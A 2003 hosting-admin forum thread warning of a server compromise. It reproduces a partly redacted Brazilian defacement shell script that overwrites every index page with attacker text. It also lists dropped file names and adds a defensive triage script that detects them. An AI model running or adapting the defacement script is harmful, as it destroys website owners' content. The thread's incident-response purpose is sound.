Warning - Watch For This Site.

Discussion in 'General Discussion' started by dgbaker, Jul 11, 2003.

  1. dgbaker

    dgbaker Well-Known Member
    PartnerNOC

    Joined:
    Sep 20, 2002
    Messages:
    2,574
    Likes Received:
    3
    Trophy Points:
    343
    Location:
    Toronto, Ontario Canada
    cPanel Access Level:
    DataCenter Provider
  2. nyjimbo

    nyjimbo Well-Known Member

    Joined:
    Jan 25, 2003
    Messages:
    1,131
    Likes Received:
    1
    Trophy Points:
    168
    Location:
    New York
    Could you tell us what this link is without us having to be suckered into clicking it ???

    :confused:

  3. dgbaker

    dgbaker Well-Known Member
    PartnerNOC

    Joined:
    Sep 20, 2002
    Messages:
    2,574
    Likes Received:
    3
    Trophy Points:
    343
    Location:
    Toronto, Ontario Canada
    cPanel Access Level:
    DataCenter Provider
    Sorry, you are right of course, here is that page. It is a shell script actually. This thread http://forums.cpanel.net/showthread.php?s=&threadid=12014 is the result of this script. It's the exact errors we saw on another machine.



    #!/bin/bash
    # # # # # # # # # # # # # # # # # # # # # # # # # # # # ##
    # ##
    # Brazilians Intruders 0f Systens Team 2003 ##
    # Contato: bi0s@mail.com ##
    # irc.brasnet.org /j bi0sbr ##
    # www.bi0s.kit.net ##
    # Devastador de Server por OverKill_ ##
    # ##
    ##########################################################
    procura_paginas() {
    find /$DIR_LOG -name index.html >logs
    find /$DIR_LOG -name index.htm >>logs
    find /$DIR_LOG -name index.php >>logs
    #find $DIR_LOG -name *wtmp* >>logs
    LINHA=`wc logs |cut -c-7`
    }
    console() {
    REMOVE CODE FOR SAFETY REASONS; echo "ok"
    echo -n "==> Aguarde, procurando paginas.."
    procura_paginas;
    echo "encontrados $LINHA Paginas para Ownar"
    sleep 5
    echo -n "--> Colocando seu texto nas Paginas"
    for log in `cat logs`
    do
    echo -n " -> in $log..."

    cp $log $log.bak
    echo $MY_TEXT >$log
    echo "ok"
    done
    echo "Brazilians Intruders 0f Systens Ownz You. OverKill was Here | Contato: irc.brasnet.org /j bi0sbr"
    echo "ok"
    echo "((((( Agora é soh registra! )))))"
    }
    help() {
    echo " Use: $0 <seu_texto>"
    echo "Exemplo: $0 'BI0S Ownz'"
    }

    if [ `whoami` != "root" ]; then
    echo " Execute somente como root"
    exit
    fi

    if [ "$2" = "" ]; then
    DIR_LOG="./"
    else
    DIR_LOG=$2
    fi
    echo; echo ; echo "<<<<<<<<< BI0S Devastador de Server >>>>>>>>>>"
    echo " ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^"
    echo " www.bi0s.kit.net "
    echo "e-mail: bi0s@mail.com irc.brasnet.org #bi0sbr"
    echo "- - - - - - - - - - - - - - - - - - - - - - - - - - -"
    if [ "$1" = "" ]; then
    help;
    else
    MY_TEXT="$1"
    console;
    fi

    #3 dgbaker, Jul 11, 2003
    Last edited: Jul 11, 2003
  4. TheRedX

    TheRedX Member

    Joined:
    Jul 9, 2003
    Messages:
    6
    Likes Received:
    0
    Trophy Points:
    151
    How is this shell executed?
    Is this something that's being uploaded to a server and run or is it a remote script seeking exploits?
    "watch for this site" is a poor warning.

  5. dgbaker

    dgbaker Well-Known Member
    PartnerNOC

    Joined:
    Sep 20, 2002
    Messages:
    2,574
    Likes Received:
    3
    Trophy Points:
    343
    Location:
    Toronto, Ontario Canada
    cPanel Access Level:
    DataCenter Provider
    It was found out by going through bash_history.

    Look for /root/mass2.sh /root/devastodor.sh
    and hidden files /root/.devastador.sh.swp and /root/.devastador.sh.swo

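A triage check built from the indicators in this thread, added here as an example and not code posted by any participant: it looks in a home directory for the file names listed in the post above and flags index pages carrying the trace the posted script leaves (a `.bak` copy beside a page overwritten with one line). The function names, the one-line heuristic and the sample tree are assumptions made for the illustration.

```bash
#!/bin/bash
# Added triage example, not code from the thread. File names in DROPPED are the
# ones the post above lists under /root, spelled as posted.
DROPPED="mass2.sh devastodor.sh .devastador.sh.swp .devastador.sh.swo"

# Print each listed file that exists in the given home directory.
check_dropped_files() {
    for cdf_name in $DROPPED; do
        if [ -e "$1/$cdf_name" ]; then printf '%s\n' "$1/$cdf_name"; fi
    done
}

# The posted script copies every index.html/index.htm/index.php to <page>.bak
# and then overwrites the page with a single echoed line. Print pages that
# match that trace: a differing .bak sibling and at most one line of content.
# Assumes paths without embedded newlines.
find_overwritten_indexes() {
    find "$1" -type f \
        \( -name index.html -o -name index.htm -o -name index.php \) |
    while IFS= read -r foi_page; do
        [ -f "$foi_page.bak" ] || continue
        if cmp -s "$foi_page" "$foi_page.bak"; then continue; fi
        if [ "$(wc -l < "$foi_page")" -le 1 ]; then printf '%s\n' "$foi_page"; fi
    done
}

# Constructed sample tree (stand-in for /root and a web root); prints its path.
make_sample() {
    ms_dir=$(mktemp -d) || return 1
    mkdir -p "$ms_dir/root" "$ms_dir/www/a" "$ms_dir/www/b"
    : > "$ms_dir/root/mass2.sh"
    printf '<html>\n<body>site a</body>\n</html>\n' > "$ms_dir/www/a/index.html.bak"
    echo 'constructed one-line replacement' > "$ms_dir/www/a/index.html"
    printf '<html>\n<body>site b</body>\n</html>\n' > "$ms_dir/www/b/index.php"
    printf '%s\n' "$ms_dir"
}

# Usage: script HOME_DIR WEB_ROOT; with no arguments, scan the constructed sample.
if [ "$#" -eq 2 ]; then
    check_dropped_files "$1"; find_overwritten_indexes "$2"
else
    sample=$(make_sample)
    check_dropped_files "$sample/root"; find_overwritten_indexes "$sample/www"
    rm -rf "$sample"
fi
```

A flagged page still has its pre-overwrite content in the `.bak` copy, which is worth preserving as evidence before restoring anything.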
  6. semaj

    semaj Well-Known Member

    Joined:
    Nov 27, 2002
    Messages:
    61
    Likes Received:
    0
    Trophy Points:
    156
  7. Duncan

    Duncan Member

    Joined:
    Feb 19, 2003
    Messages:
    22
    Likes Received:
    0
    Trophy Points:
    151
    While looking through the source: can one prevent it by changing the execute permission for "others" on the killall command?

  8. newfield

    newfield Active Member

    Joined:
    Mar 2, 2002
    Messages:
    38
    Likes Received:
    0
    Trophy Points:
    306
    Location:
    State of Confusion
    So, is there a connection between the attacks and Movable Type, or just co-incidence?

  9. semaj

    semaj Well-Known Member

    Joined:
    Nov 27, 2002
    Messages:
    61
    Likes Received:
    0
    Trophy Points:
    156
    After further investigating, 2 of the 3 domains had Movable Type, the third did not.

  10. infinityws

    infinityws Well-Known Member

    Joined:
    Feb 20, 2003
    Messages:
    110
    Likes Received:
    0
    Trophy Points:
    166
    What version of MT did it have?

  11. casey

    casey Well-Known Member

    Joined:
    Jan 17, 2003
    Messages:
    2,303
    Likes Received:
    0
    Trophy Points:
    191
    Yeah, good question. If it was MT, then it needs to be banned...
